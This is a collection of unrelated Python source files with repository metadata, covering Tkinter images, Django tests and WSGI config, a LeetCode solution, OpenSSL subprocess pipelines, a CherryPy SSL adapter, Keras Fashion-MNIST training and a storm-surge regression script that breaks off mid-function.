def name(self, value):
print('change...')
self._name = value
@name.deleter # name = name.deleter(name)
def name(self):
print('remove...')
del self._name
def main ():
bob = Person('Bob Smith') # bob has a managed attribute
print(bob.name) # Runs name getter (name 1)
print ("addr(Person.name.getter):", hex(id((Person.name.getter))))
bob.name = 'Robert Smith' # Runs name setter (name 2)
print ("addr(Person.name.setter):", hex(id((Person.name.setter))))
print(bob.name)
del bob.name # Runs name deleter (name 3)
print('-'*20)
sue = Person('Sue Jones') # sue inherits property too
print(sue.name)
print(Person.name.__doc__) # Or help(Person.name)
print ("type (Person.name):", type (Person.name))
print ("hex(id(Person.name)):", hex(id(Person.name)))
print ("type (Person.name.getter):", type (Person.name.getter))
print ("type (Person.name.setter):", type (Person.name.setter))
print ("type (Person.name.deleter):", type (Person.name.deleter))
print ("addr(Person.name.getter):", hex(id((Person.name.getter))))
print ("addr (Person.name.setter):", hex(id((Person.name.setter))))
print ("addr (Person.name.deleter):", hex(id(Person.name.deleter)))
main ()
|
[
"amit2766@gmail.com"
] |
amit2766@gmail.com
|
6589281398355c7fc10996ec4525e0d770330e54
|
db57094349de63766daf70a2e6bdb06bf3af09cf
|
/Cap05_Tkinter/34_images.py
|
75d83162c1ff336bb175ae05bd17c0c8d302ff12
|
[] |
no_license
|
frclasso/turma1_Python_Modulo2_2019
|
2f9e9aebc48c1c0b92b684ad92958bc557866cde
|
0b7f0fac0a1de4a2dbe4ff4fb2985fbfee89ed33
|
refs/heads/master
| 2020-04-17T19:36:07.545787
| 2019-06-10T15:29:10
| 2019-06-10T15:29:10
| 166,871,517
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 310
|
py
|
from tkinter import *
from PIL import Image
from PIL import ImageTk
window = Tk()
window.title("Images and incons")
icon = Image.open('python_logo.png')
icon = icon.resize((300,200), Image.ANTIALIAS)
photoImg = ImageTk.PhotoImage(icon)
Label(window, image=photoImg).grid(row= 0, column=0)
window.mainloop()
|
[
"frcalsso@yahoo.com.br"
] |
frcalsso@yahoo.com.br
|
5878e977598eb5846f58ee444eb02ccef892e5d7
|
06cabd66791a5ee15bb3ba4b04d8bc8dea5bfda0
|
/Python modules/MakePdf_old.py
|
8203bd500d8b65d5bac2e798af6e0af5f18b62bc
|
[] |
no_license
|
claiello/python_data_analysis
|
f7405dfd15f0dccd2089b1878af40b9d075071d2
|
0b8d3cc5717243e72214dc24a7fc823220e13179
|
refs/heads/master
| 2020-04-17T20:36:51.720891
| 2017-04-23T10:00:08
| 2017-04-23T10:00:08
| 66,181,455
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 829
|
py
|
# test
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.pyplot as plt
def multipage(filename, figs=None, dpi=200):
pp = PdfPages(filename)
if figs is None:
figs = [plt.figure(n) for n in plt.get_fignums()]
for fig in figs:
#fig.set_size_inches(1000./fig.dpi,600./fig.dpi)
fig.set_size_inches(1200./fig.dpi,900./fig.dpi)
fig.savefig(pp, format='pdf')
pp.close()
#plt.figure(figsize=(8, 6), dpi=80)
def multipage_longer(filename, figs=None, dpi=200):
pp = PdfPages(filename)
if figs is None:
figs = [plt.figure(n) for n in plt.get_fignums()]
for fig in figs:
#fig.set_size_inches(1000./fig.dpi,600./fig.dpi)
fig.set_size_inches(1600./fig.dpi,1200./fig.dpi)
fig.savefig(pp, format='pdf')
pp.close()
|
[
"claiello@gmail.com"
] |
claiello@gmail.com
|
5490923cd851a1f6025d71a2c24cadd7013227ab
|
28be2173e5590cc5b03119e9b83c57980e6a7e8a
|
/learnwithpeople/wsgi.py
|
70d79666fb99a92372c78e6ca89fa8357aaf18ee
|
[
"MIT"
] |
permissive
|
EdgarOrnelas/learning-circles
|
cd164f123885ed2079b34ad394c9849b370563b9
|
293c849321d735aebbdcb6c65b7c92f751f9fd89
|
refs/heads/master
| 2021-01-21T20:56:35.429589
| 2017-06-16T09:20:46
| 2017-06-16T09:20:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 441
|
py
|
"""
WSGI config for learnwithpeople project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "learnwithpeople.settings")
from django.core.wsgi import get_wsgi_application
from dj_static import Cling
application = Cling(get_wsgi_application())
|
[
"dirkcuys@gmail.com"
] |
dirkcuys@gmail.com
|
fd762726f5e677c8313ab0c32b7230cce74d9b04
|
2b4790d77439d89ad27bdd04bac539283f0dd605
|
/basic_ex/11-module.py
|
f30ced73ca20173a9af871afa196d9b7e56f467c
|
[] |
no_license
|
ajioy/python-ex
|
9fde4bcfe35edeee5050365660a03bdb6b913da1
|
982a3cdf0de0e140faa4cb539f2961b311de2c2a
|
refs/heads/master
| 2020-04-05T14:06:09.909935
| 2018-08-14T14:43:55
| 2018-08-14T14:43:55
| 59,105,033
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 244
|
py
|
# -*- coding:utf-8 -*-
import sys
def test():
args = sys.argv
if len(args) == 1:
print 'Hello, world'
elif len(args) == 2:
print 'Hello, %s' % args[1]
else:
print 'Too many arguments!'
if __name__ == '__main__':
test()
|
[
"ajioy@hotmail.com"
] |
ajioy@hotmail.com
|
c1060ead727b0ede86f928cc668a97b2d4ad13c8
|
b6ab5a3ff4402ed085557cd5ff354ab2ead6e6f8
|
/leet_code/rotten_oranges.py
|
3f761e12152d708fc5ec530ac701836bb1ed4be6
|
[] |
no_license
|
sahiljajodia01/Competitive-Programming
|
e51587110640663aa32f220feddf6ab10f17c445
|
7ae9b45654aff513bceb0fc058a67ca49273a369
|
refs/heads/master
| 2021-07-17T08:23:24.143156
| 2020-06-05T11:34:14
| 2020-06-05T11:34:14
| 163,054,750
| 0
| 1
| null | 2019-10-31T05:36:35
| 2018-12-25T06:48:39
|
C++
|
UTF-8
|
Python
| false
| false
| 1,385
|
py
|
# https://leetcode.com/problems/rotting-oranges/
####### Straightforward BFS solution ##########
class Solution:
def orangesRotting(self, grid: List[List[int]]) -> int:
q = []
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j] == 2:
q.append([i, j])
minute = 0
while q != []:
# print(q)
minute += 1
temp = []
for i in range(len(q)):
x, y = q[i]
neighbours = [[1, 0], [0, 1], [-1, 0], [0, -1]]
for n in neighbours:
xn, yn = (x + n[0]), (y+ n[1])
if xn < 0 or xn >= len(grid) or yn < 0 or yn >= len(grid[0]) or grid[xn][yn] == 0 or grid[xn][yn] == 2:
continue
grid[xn][yn] = 2
if [xn, yn] not in temp:
temp.append([xn, yn])
q = temp
# print(minute)
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j] == 1:
return -1
if minute == 0:
return 0
return minute - 1
|
[
"sahil.jajodia@gmail.com"
] |
sahil.jajodia@gmail.com
|
6f89b5f827a55c4d0a84b8ab0580245c093ab1d8
|
acb14262588fb356efb3d1bf3aab8634e43f1a4f
|
/app/recipe/tests/test_tag_api.py
|
9ecdb111ed9fe55141cc540e61cd2ba1bb1d3d2c
|
[
"MIT"
] |
permissive
|
Gilles00/recipe-app-api
|
6d37157e4e0081ba152ccca740fdd13ad03d3aaf
|
2ea0de068db0dcc500d54164739184ace1a29a7b
|
refs/heads/master
| 2022-03-05T18:00:13.893911
| 2019-11-26T11:56:05
| 2019-11-26T11:56:05
| 259,035,229
| 1
| 0
|
MIT
| 2020-04-26T13:18:13
| 2020-04-26T13:18:12
| null |
UTF-8
|
Python
| false
| false
| 3,126
|
py
|
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag, Recipe
from recipe.serializers import TagSerializer
TAGS_URL = reverse("recipe:tag-list")
class PublicTagsApiTests(TestCase):
"""Test the publicly available tags API"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""Test that login is requried for retrieving tags"""
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
"""Test the authorized user tags API"""
def setUp(self):
self.user = get_user_model().objects.create_user(
"test@shahwan.me", "password123"
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_tags(self):
"""Test retrieving tags"""
Tag.objects.create(user=self.user, name="Vegan")
Tag.objects.create(user=self.user, name="Dessert")
res = self.client.get(TAGS_URL)
tags = Tag.objects.all().order_by("-name")
serializer = TagSerializer(tags, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_tags_limited_to_user(self):
"""Test that tags returned are for the authenticated user"""
user2 = get_user_model().objects.create_user("other@shahwan.me", "testpass")
Tag.objects.create(user=user2, name="Fruity")
tag = Tag.objects.create(user=self.user, name="Comfort food")
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0]["name"], tag.name)
def test_create_tag_successful(self):
"""Test creating a new tag"""
payload = {"name": "Test tag"}
self.client.post(TAGS_URL, payload)
exists = Tag.objects.filter(user=self.user, name=payload["name"]).exists()
self.assertTrue(exists)
def test_create_tag_invalid(self):
"""Test creating tag with invalid payload"""
payload = {"name": ""}
res = self.client.post(TAGS_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_tags_assigned_to_recipes(self):
"""Test filtering tags by those assigned to recipes"""
tag1 = Tag.objects.create(user=self.user, name="Breakfast")
tag2 = Tag.objects.create(user=self.user, name="lunch")
recipe = Recipe.objects.create(
title="Coriander eggs on toast", time_minutes=10, price=5.00, user=self.user
)
recipe.tags.add(tag1)
res = self.client.get(TAGS_URL, {"assigned_only": 1})
serializer1 = TagSerializer(tag1)
serializer2 = TagSerializer(tag2)
self.assertIn(serializer1.data, res.data)
self.assertNotIn(serializer2.data, res.data)
|
[
"ahmed@shahwan.me"
] |
ahmed@shahwan.me
|
9b2c3283708ae762deba2107258c8ec473d5a3cd
|
4f2f046ba81f07be7fcb0649a7d7ce55fcd9e98f
|
/tests/tests.py
|
5547f7a7f98b5d28140501f313b6b6305c838e56
|
[] |
no_license
|
konradkrasno/db_helper_manager
|
3a4b1ceca70953938ac348b855da82bf3bfe9eb0
|
273f5146437784684d069a209b98eb6d71d4756f
|
refs/heads/master
| 2023-04-21T14:57:33.434170
| 2021-05-09T18:52:01
| 2021-05-09T18:52:01
| 365,552,814
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,523
|
py
|
import unittest
from typing import Dict
from unittest import TestCase
from unittest.mock import patch, call
from db_helper_manager.db_manager import DBManager
from db_helper_manager.exceptions import ApiError
from db_helper_manager.rates import Rate
class Fixture(TestCase):
@staticmethod
def db_config() -> Dict:
return {
"DIALECT": "mysql",
"NAME": "test",
"USER": "test",
"PASSWORD": "test",
"HOST": "localhost",
"PORT": 3306,
}
@staticmethod
def json() -> Dict:
return {
"table": "A",
"currency": "dolar amerykański",
"code": "USD",
"rates": [
{
"no": "087/A/NBP/2021",
"effectiveDate": "2021-05-07",
"mid": 3.7861,
}
],
}
def setUp(self) -> None:
self.manager = DBManager(self.db_config())
def tearDown(self) -> None:
pass
class RateTests(Fixture):
    """Tests for Rate.get_current_rate_in_pln with the HTTP layer mocked out."""

    @patch("requests.get")
    def test_get_current_rate_in_pln_when_ok(self, mock_get):
        # A 200 response carrying the canned fixture payload should yield its mid rate.
        response = mock_get.return_value
        response.status_code = 200
        response.json = self.json
        self.assertEqual(Rate.get_current_rate_in_pln("usd"), 3.7861)

    @patch("requests.get")
    def test_get_current_rate_in_pln_when_error(self, mock_get):
        # Any non-200 status from the API must surface as ApiError.
        mock_get.return_value.status_code = 404
        with self.assertRaises(ApiError):
            Rate.get_current_rate_in_pln("usd")
class CommandsTests(Fixture):
    """Tests for DBManager commands; DB session, HTTP and file I/O are all mocked."""

    # @patch decorators apply bottom-up, so mock arguments arrive in the
    # reverse order of the decorator list.
    @patch("db_helper_manager.commands.logger")
    @patch("db_helper_manager.commands.text")
    @patch("db_helper_manager.commands.UpdateUnitPrices.get_current_rate_in_pln")
    @patch("db_helper_manager.commands.Session.execute")
    def test_update_unit_prices(self, mock_session, mock_rate, mock_text, mock_logger):
        """The SQL statement must be executed once with both mocked rates."""
        mock_text.return_value = "mocked statement"
        mock_rate.return_value = 3.7861
        self.manager.update_unit_prices()
        # Both currencies come from the same mocked rate lookup.
        mock_session.assert_called_once_with(
            "mocked statement",
            [
                {
                    "EURORate": 3.7861,
                    "USDRate": 3.7861,
                }
            ],
        )
        mock_logger.info.assert_called()

    @patch("db_helper_manager.commands.logger")
    @patch("db_helper_manager.commands.csv.writer")
    @patch("builtins.open")
    @patch("db_helper_manager.commands.Session.execute")
    def test_fetch_product_data_as_csv(
        self, mock_session, mock_open, mock_writer, mock_logger
    ):
        """Rows from the DB must be written to products.csv after a header row."""
        mock_session.return_value = [["fake1"], ["fake2"]]
        self.manager.fetch_product_data_as_csv()
        mock_open.assert_called_once_with("products.csv", "w", newline="")
        # Header (field names) first, then one writerow per DB row.
        expected_calls = [call(self.manager.fields), call(["fake1"]), call(["fake2"])]
        mock_writer().writerow.assert_has_calls(expected_calls)
        mock_logger.info.assert_called_once_with("Data successfully downloaded.")

    @patch("db_helper_manager.commands.UpdateUnitPrices.update_unit_prices")
    @patch("db_helper_manager.commands.FetchProductData.fetch_product_data_as_csv")
    def test_execute_command(self, mock_fetch_data, mock_update_prices):
        """execute_command must dispatch each known command name to its method."""
        self.manager.execute_command("fetch_product_data_as_csv")
        mock_fetch_data.assert_called_once()
        self.manager.execute_command("update_unit_prices")
        mock_update_prices.assert_called_once()

    @patch("db_helper_manager.commands.Commands.print_command_list")
    def test_execute_command_when_wrong_command(self, mock_print_command_list):
        """An unknown command name should print the available command list."""
        self.manager.execute_command("wrong_command")
        mock_print_command_list.assert_called_once()

    @patch("builtins.print")
    def test_execute_command_when_wrong_args(self, mock_print):
        """Extra positional arguments should be reported, not raised."""
        self.manager.execute_command("update_unit_prices", "arg1", "arg2")
        mock_print.assert_called_once_with(
            "update_unit_prices() takes 1 positional argument but 3 were given"
        )

    @patch("db_helper_manager.commands.logger")
    @patch("db_helper_manager.commands.UpdateUnitPrices.update_unit_prices")
    def test_execute_command_when_error(self, mock_update_prices, mock_logger):
        """Exceptions inside a command must be logged via logger.exception."""
        mock_update_prices.side_effect = Exception("Exception occurred")
        self.manager.execute_command("update_unit_prices")
        mock_logger.exception.assert_called_once_with(mock_update_prices.side_effect)
# Allow running this module directly (python tests.py) as well as via a runner.
if __name__ == "__main__":
    unittest.main()
|
[
"konradkrasno@gmail.com"
] |
konradkrasno@gmail.com
|
0f7bf9ae5f1cdcff88b17c9469e88632bb26be4e
|
a66fd9c13d2705c1603fb10909ee9074659a1055
|
/03_DNN_Mnist_fashion_keras.py
|
c0a6cdfbd29ac3338e5ef1a6397a646da341b9f2
|
[] |
no_license
|
lhs7091/pythonTensor2
|
feaf609402b2e2cc7c02ec00704a1430e309ef8a
|
0c5e7165c1e2b1e99b68ab932f811facf2b01043
|
refs/heads/master
| 2021-02-27T03:09:47.524839
| 2020-03-08T07:00:05
| 2020-03-08T07:00:05
| 245,572,642
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,798
|
py
|
from tensorflow.keras.datasets import fashion_mnist
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.models import Sequential
# BUG FIX: Flatten was imported from the private tensorflow_core.python
# package, which breaks across TensorFlow releases; use the public path.
from tensorflow.keras.layers import Dense, Flatten
import matplotlib.pyplot as plt
import numpy as np
import random

# Train a small fully-connected classifier on Fashion-MNIST and display
# the prediction for one random test image.
(X_train, y_train), (X_test, y_test) = fashion_mnist.load_data()

# Human-readable names for the ten Fashion-MNIST classes.
labels = {0: 'T-shirt/top',
          1: 'Trouser',
          2: 'Pullover',
          3: 'Dress',
          4: 'Coat',
          5: 'Sandal',
          6: 'Shirt',
          7: 'Sneaker',
          8: 'Bag',
          9: 'Ankle Boot'}

# dataset reshape
# integer labels -> one-hot category vectors
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)

# scaling: pixel values into [0, 1]
X_train = X_train/255.0
X_test = X_test/255.0

# modeling: Dense applied per image row, then flattened into the classifier head
model = Sequential()
model.add(Dense(784, input_shape=(28,28,), activation='relu'))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dense(10, activation='softmax'))
model.summary()

# compiling model
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])

# input dataset in model; observed output of a previous run:
# 48000/48000 [==============================] - 22s 462us/sample - loss: 0.2445 - accuracy: 0.9248 - val_loss: 0.1263 - val_accuracy: 0.9633
model.fit(X_train, y_train, batch_size=200, epochs=1, validation_split=0.2)

# evaluation; observed output of a previous run:
# 10000/10000 [==============================] - 2s 202us/sample - loss: 0.1285 - accuracy: 0.9611
# [0.12847008485868572, 0.9611]
score = model.evaluate(X_test, y_test)
print(score)

# real prediction on one random test sample
prediction = model.predict(X_test)
# BUG FIX: randint's upper bound is inclusive, so randint(0, N) could
# return N and raise IndexError; exclude the final index.
r = random.randint(0, y_test.shape[0] - 1)
print('label:', labels[np.argmax(y_test[r])])
print('prediction:', labels[np.argmax(prediction[r])])
plt.imshow(X_test[r].reshape(28,28), cmap='binary')
plt.show()
|
[
"lhs7091@naver.com"
] |
lhs7091@naver.com
|
ebb32f52c472bcc16a1678079beff87a7a0bae7c
|
4b3883b1591987c6fbcddab7fd2e15d7b7243861
|
/books/effectivepy-v2/chap7/ad52/encrypt_data.py
|
9c4eeb95ad2d0770adbea5f23a8c6f6674edb294
|
[
"MIT"
] |
permissive
|
MerleLiuKun/my-python
|
41bdbf6e05281728a824e04da043902dc0fd4698
|
0bec138cc6a9870ca47e0e62e9b92d50fb6cb3d8
|
refs/heads/master
| 2021-06-11T10:22:44.948418
| 2021-06-02T13:08:18
| 2021-06-02T13:08:18
| 160,791,142
| 1
| 1
|
MIT
| 2020-05-19T15:10:00
| 2018-12-07T07:58:29
|
Python
|
UTF-8
|
Python
| false
| false
| 1,231
|
py
|
"""
"""
import os
import subprocess
def run_encrypt(data):
    """Start an `openssl enc -des3` child process and feed *data* to its stdin.

    Returns the Popen handle; the caller is expected to consume
    proc.stdout (or call communicate()) to collect the ciphertext.
    """
    # NOTE(review): the passphrase is hard-coded and handed over via the
    # environment — fine for a book exercise, never in production code.
    child_env = dict(os.environ)
    child_env["password"] = "zf7ShyBhZOraQDdE/FiZpm/m/8f9X+M1"
    args = ["openssl", "enc", "-des3", "-pass", "env:password"]
    proc = subprocess.Popen(
        args,
        env=child_env,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
    )
    proc.stdin.write(data)
    proc.stdin.flush()
    return proc
# procs = []
# for _ in range(3):
# data = os.urandom(10)
# proc = run_encrypt(data)
# procs.append(proc)
#
# for proc in procs:
# out, _ = proc.communicate()
# print(out[-10:])
def run_hash(input_stdin):
    """Start an `openssl dgst -whirlpool` child reading from *input_stdin*.

    Passing another process's stdout as *input_stdin* chains the two
    children together at the OS level, with no Python-side byte copying.
    """
    command = ["openssl", "dgst", "-whirlpool", "-binary"]
    return subprocess.Popen(command, stdin=input_stdin, stdout=subprocess.PIPE)
# Fan out: start ten encrypt -> hash pipelines in parallel.
encrypt_procs = []
hash_procs = []
for _ in range(10):
    data = os.urandom(100)
    e_proc = run_encrypt(data)
    encrypt_procs.append(e_proc)
    h_proc = run_hash(e_proc.stdout)
    hash_procs.append(h_proc)
    # Drop our handle on the encryptor's stdout so the hasher owns the
    # pipe; otherwise the upstream child would never see SIGPIPE if the
    # downstream one exited early.
    e_proc.stdout.close()
    e_proc.stdout = None
# Wait for every child and verify clean exits; print a tail of each digest.
for proc in encrypt_procs:
    proc.communicate()
    assert proc.returncode == 0
for proc in hash_procs:
    out, _ = proc.communicate()
    print(out[-10:])
    assert proc.returncode == 0
|
[
"merle.liukun@gmail.com"
] |
merle.liukun@gmail.com
|
aaf296fd3b0614fc9cefe51e775d229b510d5319
|
cf152c053f2cedf819b81c1a746db87e07fe5ded
|
/DL/day5_buy_apple.py
|
8e98900ac8a85f86c337ee4b50fefe7e84907b89
|
[] |
no_license
|
aorura/tensorProject
|
db684e0b4aa46d9d4afd1c4b9f5bed8aa99a4c06
|
014db9a8ae8c76299c99f77dafb401cf2e86a3cc
|
refs/heads/master
| 2020-03-08T02:18:56.227130
| 2018-04-06T07:48:41
| 2018-04-06T07:48:41
| 127,855,918
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 469
|
py
|
from day5_layer_naive import *
# Worked backprop example: price of 2 apples with 10% tax, plus gradients.
apple = 100
apple_num = 2
tax = 1.1

# One multiply node per operation in the computation graph.
mul_apple_layer = MultiLayer()
mul_tax_layer = MultiLayer()

# Forward pass: (apple * apple_num) * tax
apple_price = mul_apple_layer.forward(apple, apple_num)
price = mul_tax_layer.forward(apple_price, tax)

# Backward pass: propagate d(price)/d(price) = 1 through both nodes.
dprice = 1
dapple_price, dtax = mul_tax_layer.backward(dprice)
dapple, dapple_num = mul_apple_layer.backward(dapple_price)

print("price:", int(price))
print("dapple:", dapple)
print("dapple_num:", int(dapple_num))
print("dtax:", dtax)
|
[
"hyponus@gmail.com"
] |
hyponus@gmail.com
|
453723dc7712c3b5489ebdf23891d325b1e539bd
|
5864e86954a221d52d4fa83a607c71bacf201c5a
|
/cherrypy/wsgiserver/ssl_builtin.py
|
3366c31bd7cd1a1aab714c33fc208694974566ad
|
[] |
no_license
|
connoryang/1v1dec
|
e9a2303a01e5a26bf14159112b112be81a6560fd
|
404f2cebf13b311e754d45206008918881496370
|
refs/heads/master
| 2021-05-04T02:34:59.627529
| 2016-10-19T08:56:26
| 2016-10-19T08:56:26
| 71,334,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,563
|
py
|
#Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\carbon\common\lib\cherrypy\wsgiserver\ssl_builtin.py
try:
import ssl
except ImportError:
ssl = None
from cherrypy import wsgiserver
class BuiltinSSLAdapter(wsgiserver.SSLAdapter):
    """SSL adapter for CherryPy's WSGI server built on the stdlib `ssl` module."""

    # Path to the server certificate file (set in __init__).
    certificate = None
    # Path to the certificate's private key file (set in __init__).
    private_key = None

    def __init__(self, certificate, private_key, certificate_chain = None):
        # Fail fast if the interpreter was built without ssl support.
        if ssl is None:
            raise ImportError('You must install the ssl module to use HTTPS.')
        self.certificate = certificate
        self.private_key = private_key
        self.certificate_chain = certificate_chain

    def bind(self, sock):
        # No wrapping needed at bind time; sockets are wrapped per-connection.
        return sock

    def wrap(self, sock):
        """Wrap an accepted socket in SSL and return (socket, environ)."""
        try:
            s = ssl.wrap_socket(sock, do_handshake_on_connect=True, server_side=True, certfile=self.certificate, keyfile=self.private_key, ssl_version=ssl.PROTOCOL_SSLv23)
        except ssl.SSLError as e:
            if e.errno == ssl.SSL_ERROR_EOF:
                # Peer hung up during the handshake: drop the connection.
                return (None, {})
            if e.errno == ssl.SSL_ERROR_SSL:
                if e.args[1].endswith('http request'):
                    # Looks like the client sent plain HTTP to the HTTPS
                    # port; NoSSLError lets the server respond helpfully.
                    raise wsgiserver.NoSSLError
                raise
            # NOTE(review): any other SSLError errno falls through here and
            # the `return` below raises NameError on `s` — confirm intended.
        return (s, self.get_environ(s))

    def get_environ(self, sock):
        """Build the WSGI environ entries describing the SSL connection."""
        cipher = sock.cipher()
        ssl_environ = {'wsgi.url_scheme': 'https',
         'HTTPS': 'on',
         'SSL_PROTOCOL': cipher[1],
         'SSL_CIPHER': cipher[0]}
        return ssl_environ

    def makefile(self, sock, mode = 'r', bufsize = -1):
        # Use CherryPy's file object wrapper rather than socket.makefile.
        return wsgiserver.CP_fileobject(sock, mode, bufsize)
|
[
"le02005@163.com"
] |
le02005@163.com
|
c16203a4ae9e23eee50178108cef12cff2782847
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/merra_scripts/03_model_fitting/merra882/567-tideGauge.py
|
b9b17c856c072ef1398bd25f5d67edcae774eb05
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465
| 2021-06-25T21:00:44
| 2021-06-25T21:00:44
| 229,080,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,041
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 4 15:51:30 2020
This program is designed to validate a multiple
linear regression model by using the KFOLD method
@author: Michael Tadesse
"""
import os
import numpy as np
import pandas as pd
from sklearn import metrics
from scipy import stats
from datetime import datetime
from sklearn.linear_model import LinearRegression
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
def validate():
    """
    Run 10-fold cross-validation of a PCA + multiple linear regression
    daily-max surge model for each tide gauge in [x, y), and save the
    per-gauge skill metrics (correlation, RMSE) as CSV in dir_out.
    """
    # defining directories
    dir_in = "/lustre/fs0/home/mtadesse/merraAllLagged"
    dir_out = "/lustre/fs0/home/mtadesse/merraLRValidation"
    surge_path = "/lustre/fs0/home/mtadesse/05_dmax_surge_georef"

    # cd to the lagged predictors directory
    os.chdir(dir_in)

    # half-open index range of tide gauges handled by this job
    x = 567
    y = 568

    # empty dataframe for model validation
    df = pd.DataFrame(columns = ['tg', 'lon', 'lat', 'num_year', \
                                 'num_95pcs','corrn', 'rmse'])

    # looping through
    for tg in range(x, y):
        os.chdir(dir_in)
        tg_name = os.listdir()[tg]
        print(tg, tg_name)

        ##########################################
        # check if this tg is already taken care of
        ##########################################
        os.chdir(dir_out)
        if os.path.isfile(tg_name):
            # BUG FIX: this used to `return "file already analyzed!"`,
            # which aborted the whole run at the first finished gauge
            # instead of moving on to the next one.
            print("file already analyzed!")
            continue
        os.chdir(dir_in)

        # load predictor
        pred = pd.read_csv(tg_name)
        pred.drop('Unnamed: 0', axis = 1, inplace = True)

        # add squared and cubed wind terms (as in WPI model)
        pickTerms = lambda x: x.startswith('wnd')
        wndTerms = pred.columns[list(map(pickTerms, pred.columns))]
        wnd_sqr = pred[wndTerms]**2
        wnd_cbd = pred[wndTerms]**3
        pred = pd.concat([pred, wnd_sqr, wnd_cbd], axis = 1)

        # standardize predictor data (zero mean / unit variance per column)
        dat = pred.iloc[:,1:]
        scaler = StandardScaler()
        print(scaler.fit(dat))
        dat_standardized = pd.DataFrame(scaler.transform(dat), \
                                        columns = dat.columns)
        pred_standardized = pd.concat([pred['date'], dat_standardized], axis = 1)

        # load surge data
        os.chdir(surge_path)
        surge = pd.read_csv(tg_name)
        surge.drop('Unnamed: 0', axis = 1, inplace = True)

        # remove duplicated surge rows
        surge.drop(surge[surge['ymd'].duplicated()].index, axis = 0, inplace = True)
        surge.reset_index(inplace = True)
        surge.drop('index', axis = 1, inplace = True)

        # adjust surge time format to match that of pred
        time_str = lambda x: str(datetime.strptime(x, '%Y-%m-%d'))
        surge_time = pd.DataFrame(list(map(time_str, surge['ymd'])), columns = ['date'])
        time_stamp = lambda x: (datetime.strptime(x, '%Y-%m-%d %H:%M:%S'))
        surge_new = pd.concat([surge_time, surge[['surge', 'lon', 'lat']]], axis = 1)

        # merge predictors and surge to find common time frame
        pred_surge = pd.merge(pred_standardized, surge_new.iloc[:,:2], on='date', how='right')
        pred_surge.sort_values(by = 'date', inplace = True)

        # find rows that have nans and remove them
        row_nan = pred_surge[pred_surge.isna().any(axis =1)]
        pred_surge.drop(row_nan.index, axis = 0, inplace = True)
        pred_surge.reset_index(inplace = True)
        pred_surge.drop('index', axis = 1, inplace = True)

        # in case pred and surge don't overlap
        if pred_surge.shape[0] == 0:
            print('-'*80)
            print('Predictors and Surge don''t overlap')
            print('-'*80)
            continue

        pred_surge['date'] = pd.DataFrame(list(map(time_stamp, \
                                                   pred_surge['date'])), \
                                          columns = ['date'])

        # prepare data for training/testing
        X = pred_surge.iloc[:,1:-1]
        y = pd.DataFrame(pred_surge['surge'])
        y = y.reset_index()
        y.drop(['index'], axis = 1, inplace = True)

        # apply PCA, keeping enough components for 95% of the variance
        pca = PCA(.95)
        pca.fit(X)
        X_pca = pca.transform(X)

        # apply 10 fold cross validation
        # NOTE(review): random_state without shuffle=True has no effect
        # (and raises in newer scikit-learn) — confirm intended behaviour.
        kf = KFold(n_splits=10, random_state=29)

        metric_corr = []; metric_rmse = [];
        for train_index, test_index in kf.split(X):
            X_train, X_test = X_pca[train_index], X_pca[test_index]
            y_train, y_test = y['surge'][train_index], y['surge'][test_index]

            # train regression model
            lm = LinearRegression()
            lm.fit(X_train, y_train)

            # predictions
            predictions = lm.predict(X_test)

            # evaluation matrix - only keep folds whose correlation has p < 0.05
            if stats.pearsonr(y_test, predictions)[1] >= 0.05:
                print("insignificant correlation!")
                continue
            else:
                print(stats.pearsonr(y_test, predictions))
                metric_corr.append(stats.pearsonr(y_test, predictions)[0])
                print(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
                metric_rmse.append(np.sqrt(metrics.mean_squared_error(y_test, predictions)))

        # number of years used to train/test model
        num_years = (pred_surge['date'][pred_surge.shape[0]-1] -\
                     pred_surge['date'][0]).days/365
        longitude = surge['lon'][0]
        latitude = surge['lat'][0]
        num_pc = X_pca.shape[1] #number of principal components
        corr = np.mean(metric_corr)
        rmse = np.mean(metric_rmse)

